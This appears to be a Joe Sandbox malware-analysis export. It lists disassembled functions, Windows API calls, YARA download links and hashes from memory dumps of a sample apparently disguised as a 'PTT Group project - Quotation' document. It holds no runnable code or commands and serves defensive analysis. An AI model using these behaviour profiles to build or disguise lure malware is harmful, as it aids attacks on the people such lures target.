Function 00995A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00995A82
GetMenuItemCount.USER32(00000000), ref: 00995AB9
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00995AE1
GetMenuItemID.USER32(?,?), ref: 00995B50
GetSubMenu.USER32(?,?), ref: 00995B5E
PostMessageW.USER32(?,00000111,?,00000000), ref: 00995BAF

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: fd5df365112e360e3ac8ca185e5f5765985aa5bbc9f8f3ac8b208f9f0a0f1eeb
Instruction ID: e260dfacaa0426f04ddbaeedbd9a61c29bab83c50441774027e99fff210a832b
Opcode Fuzzy Hash: fd5df365112e360e3ac8ca185e5f5765985aa5bbc9f8f3ac8b208f9f0a0f1eeb
Instruction Fuzzy Hash: 7D519031A00619EFCF11EFA8C855AAEB7B5EF88310F11446AF905B7351CB74AE41CB90

Function 0096F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0096F3F7
VariantClear.OLEAUT32(00000013), ref: 0096F469
VariantClear.OLEAUT32(00000000), ref: 0096F4C4
_memmove.LIBCMT ref: 0096F4EE
VariantClear.OLEAUT32(?), ref: 0096F53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0096F569

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 8df30a141edbf8a019b1c8d32a6314e521cdc17c1f2afd3a3e857e485592615d
Instruction ID: e3362b5c766315641b7b08ca924fefa1f764c0a00e8f6d08cb31c426ae8f69e1
Opcode Fuzzy Hash: 8df30a141edbf8a019b1c8d32a6314e521cdc17c1f2afd3a3e857e485592615d
Instruction Fuzzy Hash: 385147B5A00209EFCB14CF58D894AAAB7B8FF4C354B15856AF959DB310E730E911CFA0

Function 009726F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00972747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00972792
IsMenu.USER32(00000000), ref: 009727B2
CreatePopupMenu.USER32 ref: 009727E6
GetMenuItemCount.USER32(000000FF), ref: 00972844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00972875

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 9b226ddd4d742585c13905695cebb79446cbd87ffc42ebefb4a31f3654a9df2f
Instruction ID: 3640704125cc0dc8c88f85cec1f5c1d40962f1406b2e751f56e006bac26072fc
Opcode Fuzzy Hash: 9b226ddd4d742585c13905695cebb79446cbd87ffc42ebefb4a31f3654a9df2f
Instruction Fuzzy Hash: CC51D271A24305DFDF24CF68C888BEDBBF8EF44314F148669E4199B291D7729944CB52

Function 00911765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00912612: GetWindowLongW.USER32(?,000000EB), ref: 00912623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0091179A
GetWindowRect.USER32(?,?), ref: 009117FE
ScreenToClient.USER32(?,?), ref: 0091181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0091182C
EndPaint.USER32(?,?), ref: 00911876

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 9b879628280607fd0c405148581e0004cf325f0acaf7351d4e770e492c1e23b7
Instruction ID: d8fc4e83c37c49eeb5e0e24afe5a5c06a876ffba8bf11c6e3d16d6970ef3400d
Opcode Fuzzy Hash: 9b879628280607fd0c405148581e0004cf325f0acaf7351d4e770e492c1e23b7
Instruction Fuzzy Hash: 32418471218305AFD710DF28CC84FBA7BF8EB49724F14466AF695C72A1C7319885EB61

Function 0099B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(009D67B0,00000000,00FB5C58,?,?,009D67B0,?,0099B862,?,?), ref: 0099B9CC
EnableWindow.USER32(00000000,00000000), ref: 0099B9F0
ShowWindow.USER32(009D67B0,00000000,00FB5C58,?,?,009D67B0,?,0099B862,?,?), ref: 0099BA50
ShowWindow.USER32(00000000,00000004,?,0099B862,?,?), ref: 0099BA62
EnableWindow.USER32(00000000,00000001), ref: 0099BA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0099BAA9

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 03fc0830184aee4c52fe96a652bd658aece8ec6dea1a08fd52c74a5a525c6ba7
Instruction ID: 3cae832f678c0dfda073cbd15f3fb87cb9448734837e6d77443fb37f488cbaf7
Opcode Fuzzy Hash: 03fc0830184aee4c52fe96a652bd658aece8ec6dea1a08fd52c74a5a525c6ba7
Instruction Fuzzy Hash: E4417F30605640AFDF22CF6CE699B957BE4FF05314F1842B9EA488F2A2C739AC45DB50

Function 009873B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00985134,?,?,00000000,00000001), ref: 009873BF

Part of subcall function 00983C94: GetWindowRect.USER32(?,?), ref: 00983CA7

GetDesktopWindow.USER32 ref: 009873E9
GetWindowRect.USER32(00000000), ref: 009873F0
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00987422

Part of subcall function 009754E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0097555E

GetCursorPos.USER32(?), ref: 0098744E
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009874AC

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 3a4b75a8ba55f8bc86aa71230a79d3c0fef1a85bdfd9bd525feb4858b00eab93
Instruction ID: 1f65bc7df36c087847d654f17b7749554c09956dfe6d750ba00a7ad56c3c69c9
Opcode Fuzzy Hash: 3a4b75a8ba55f8bc86aa71230a79d3c0fef1a85bdfd9bd525feb4858b00eab93
Instruction Fuzzy Hash: 5B31D472509305ABD720EF64D849F5BFBAAFF88314F10491AF589D71A1C670E948CB92

Function 00968D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009685F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00968608
Part of subcall function 009685F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00968612
Part of subcall function 009685F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00968621
Part of subcall function 009685F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00968628
Part of subcall function 009685F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0096863E

GetLengthSid.ADVAPI32(?,00000000,00968977), ref: 00968DAC
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00968DB8
HeapAlloc.KERNEL32(00000000), ref: 00968DBF
CopySid.ADVAPI32(00000000,00000000,?), ref: 00968DD8
GetProcessHeap.KERNEL32(00000000,00000000,00968977), ref: 00968DEC
HeapFree.KERNEL32(00000000), ref: 00968DF3

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: fe23980cedf981c78d4ec27e6af9c1fbb125708cf80c373f18410aff5d7ff553
Instruction ID: 7850a98ebb4f1f792fb2ef0a249e500e6c9a8b7f19983d7d2df28b68ef0dc162
Opcode Fuzzy Hash: fe23980cedf981c78d4ec27e6af9c1fbb125708cf80c373f18410aff5d7ff553
Instruction Fuzzy Hash: 5211BE71514605FFDB209FA8CC29BAFBBADEF55315F10422AF845D7290DB329900DBA0

Function 00968AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00968B2A
OpenProcessToken.ADVAPI32(00000000), ref: 00968B31
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00968B40
CloseHandle.KERNEL32(00000004), ref: 00968B4B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00968B7A
DestroyEnvironmentBlock.USERENV(00000000), ref: 00968B8E

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 30ce365a10cfa572434005a09b19bbdb2e5f27416abcb1dc29bcf680f2d59675
Instruction ID: db73aee6952a53314567a954bcd33194afb84cd93ed7e8a510f2abf9f3b0086a
Opcode Fuzzy Hash: 30ce365a10cfa572434005a09b19bbdb2e5f27416abcb1dc29bcf680f2d59675
Instruction Fuzzy Hash: A21159B2504209ABDF018FA8ED49FEEBBADEF08344F044165FE04A2160C7768D64AB60

Function 0099C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 009112F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0091134D
Part of subcall function 009112F3: SelectObject.GDI32(?,00000000), ref: 0091135C
Part of subcall function 009112F3: BeginPath.GDI32(?), ref: 00911373
Part of subcall function 009112F3: SelectObject.GDI32(?,00000000), ref: 0091139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0099C1C4
LineTo.GDI32(00000000,00000003,?), ref: 0099C1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0099C1E6
LineTo.GDI32(00000000,00000000,?), ref: 0099C1F6
EndPath.GDI32(00000000), ref: 0099C206
StrokePath.GDI32(00000000), ref: 0099C216

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: b7a1ef261fb769250904e6fcbe2b3e995f47e0c741ff7d93d51be5fe7588d091
Instruction ID: 4821e6906582b242fa5ddcfe0e932b52b6185ca5c55c627e1c90a7da04c9953d
Opcode Fuzzy Hash: b7a1ef261fb769250904e6fcbe2b3e995f47e0c741ff7d93d51be5fe7588d091
Instruction Fuzzy Hash: 83111E7640810DBFDF119F94DC88FDA7FADEB08394F048022BA1886161C7719D95EBA0

Function 009303A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 009303D3
MapVirtualKeyW.USER32(00000010,00000000), ref: 009303DB
MapVirtualKeyW.USER32(000000A0,00000000), ref: 009303E6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 009303F1
MapVirtualKeyW.USER32(00000011,00000000), ref: 009303F9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00930401

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 6b3d276912dfdfe26247507d0edd92ad720a1e634aa9fd402f8b0b658923c2ae
Instruction ID: c25f79965144a4beaca9d67d759431737530a0bbedb537aa861836ae7f7e7256
Opcode Fuzzy Hash: 6b3d276912dfdfe26247507d0edd92ad720a1e634aa9fd402f8b0b658923c2ae
Instruction Fuzzy Hash: E2016CB09017597DE3008F5A8C85B52FFB8FF19354F00411BA15C87941C7F5A864CBE5

Function 0097568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0097569B
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009756B1
GetWindowThreadProcessId.USER32(?,?), ref: 009756C0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009756CF
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009756D9
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009756E0

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: b1d241dfe4592bcb32c3fc5513f29aa35ee7b2e09eb9ebeca758aafa47b37c46
Instruction ID: 89b38022bdd39ccd99aa01bc43847fdb838c07b2ec00e950942f008cc9a65bb2
Opcode Fuzzy Hash: b1d241dfe4592bcb32c3fc5513f29aa35ee7b2e09eb9ebeca758aafa47b37c46
Instruction Fuzzy Hash: FCF03032259658BBE7315BA6DC0EEEFBB7CEFC6B11F00016AFA04D1050D7A11A0196B5

Function 009774D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 009774E5
EnterCriticalSection.KERNEL32(?,?,00921044,?,?), ref: 009774F6
TerminateThread.KERNEL32(00000000,000001F6,?,00921044,?,?), ref: 00977503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00921044,?,?), ref: 00977510

Part of subcall function 00976ED7: CloseHandle.KERNEL32(00000000,?,0097751D,?,00921044,?,?), ref: 00976EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 00977523
LeaveCriticalSection.KERNEL32(?,?,00921044,?,?), ref: 0097752A

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: aa326ee1148a58f7ec6b188097b72e8bb54ea9cf165f7321aad4a8ea8c9f5781
Instruction ID: 73d865c08618c440485a9a728292032a66e0242b8af5bd6eb95d405a8022b345
Opcode Fuzzy Hash: aa326ee1148a58f7ec6b188097b72e8bb54ea9cf165f7321aad4a8ea8c9f5781
Instruction Fuzzy Hash: FBF03A3A158A12ABDB111B68EC98AEEB72AAF45302B100533F202D10A0CB756811DBA0

Function 00968E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00968E7F
UnloadUserProfile.USERENV(?,?), ref: 00968E8B
CloseHandle.KERNEL32(?), ref: 00968E94
CloseHandle.KERNEL32(?), ref: 00968E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 00968EA5
HeapFree.KERNEL32(00000000), ref: 00968EAC

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 3cee0b106ee38f82c8a98252c300f9fe4d9977726bb41eceb2e7f246d576967f
Instruction ID: 0ac985313cae742e02d2ed96d944799c7602fd3f412167987e663bbd055eea4e
Opcode Fuzzy Hash: 3cee0b106ee38f82c8a98252c300f9fe4d9977726bb41eceb2e7f246d576967f
Instruction Fuzzy Hash: FAE0C23601C401FBDA011FF9EC1C90AFB69FB89362B208232F219C1070CB329420EB90

Function 00988902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00988928
CharUpperBuffW.USER32(?,?), ref: 00988A37
VariantClear.OLEAUT32(?), ref: 00988BAF

Part of subcall function 00977804: VariantInit.OLEAUT32(00000000), ref: 00977844
Part of subcall function 00977804: VariantCopy.OLEAUT32(00000000,?), ref: 0097784D
Part of subcall function 00977804: VariantClear.OLEAUT32(00000000), ref: 00977859

Strings

Incorrect Parameter format, xrefs: 00988960, 00988B22
AUTOIT.ERROR, xrefs: 00988A3D

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 7ff473ad31a79caeea5ba24629b078b379752be3b7b4b770311da1b18afd85c0
Instruction ID: 2b7b6b7556f154ec49e4d1ddfc766e7d679efdf8bc37a4aa17d8bf2b5b009f71
Opcode Fuzzy Hash: 7ff473ad31a79caeea5ba24629b078b379752be3b7b4b770311da1b18afd85c0
Instruction Fuzzy Hash: 2B918E716083059FC710EF28C494A6BBBE4EFC9314F44896EF89A8B361DB31E945CB52

Function 00972F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0092FEC6: _wcscpy.LIBCMT ref: 0092FEE9

_memset.LIBCMT ref: 00973077
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009730A6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00973159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00973187

Strings

0, xrefs: 00973063

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 7bd7d6af5b7b5a5ab92a3ee93f61347a0e2e391a24186a9f3b41cc4c93038251
Instruction ID: 9787fd0b7569907edb2e21188c23136ea732602668500c6a0cef8274007ed578
Opcode Fuzzy Hash: 7bd7d6af5b7b5a5ab92a3ee93f61347a0e2e391a24186a9f3b41cc4c93038251
Instruction Fuzzy Hash: 2F51B17261C3019ED7259F28C845B6BB7E8EF85310F44CA2EF899D3191DB70CE44AB52

Function 0096DA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0096DAC5
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0096DAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0096DB0C
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0096DB8E

Strings

DllGetClassObject, xrefs: 0096DB01

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

